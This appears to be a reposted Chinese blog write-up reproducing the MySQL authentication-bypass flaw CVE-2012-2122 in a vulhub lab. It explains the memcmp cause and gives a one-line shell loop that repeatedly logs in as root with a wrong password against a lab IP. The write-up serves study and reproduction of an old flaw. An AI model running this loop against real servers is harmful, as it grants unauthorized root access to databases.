热门标签
热门文章
- 1蓝牙技术|蓝牙远距离遥控,伦茨科技ST17H66可以帮到你_st17h66汽车无钥匙进入蓝牙
- 2RabbitMQ面试要点
- 3select * 与 count(*)数量不一致_技术分享 | MySQL:count(*)、count(字段) 实现上区别
- 4鸿蒙星河版笔记来袭!界面开发、组件的属性和方法_鸿蒙下列组件类型中,容器组件是
- 5算法与数据结构复习 第四章 字符串(详解)_设主串 t = abaabaabcabaabc,模式串 s = abaabc,采用 kmp 算法进行
- 6Vue项目遇到的问题解决及优化,如提示框和页码显示_vue3 的 防止catch错误返回出现在页面上
- 7PTA L1-002:打印沙漏(python)_l1-002打印沙漏python
- 8浅谈AI人体姿态识别技术的先进性及安防视频监控应用场景_ai 识别视频中人物的动作
- 9阿里云服务器端口授权对象设置自定ip访问_授权对象请输入ipv4 cidr地址
- 10【EI会议】2024年电网、电气与电子工程国际会议(PCEEE 2024)_2024 international conference on power grid, elect
当前位置: article > 正文
[漏洞复现]Mysql 身份认证绕过漏洞(CVE-2012-2122)_mysql 5.5.62 cve漏洞
作者:人工智能uu | 2024-08-16 08:32:03
赞
踩
mysql 5.5.62 cve漏洞
mysql身份验证绕过漏洞
受影响版本
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
注:只能在特定编译环境下进行,即编译MySQL的时候加了-fno-builtin,并且所使用的glibc是经SSE优化后的(一般系统自带的都是如此)。
出现这个漏洞是由于memcmp函数只返回返回-128到127范围内的值,在某些平台上进行了优化,导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。大约256次就可以成功一次。具体也没理解清楚。可以看看下面的网址。
参考:https://vulhub.org/#/environments/mysql/CVE-2012-2122/ https://www.freebuf.com/vuls/3815.html
https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/
https://www.freebuf.com/vuls/3815.html
复现
我用vulhub搭建了环境
攻击机:kali :192.168.34.80
靶机:ubuntu18:192.168.34.182
for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.34.182 -P3306 ; done
- 1
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/人工智能uu/article/detail/987380
推荐阅读
相关标签
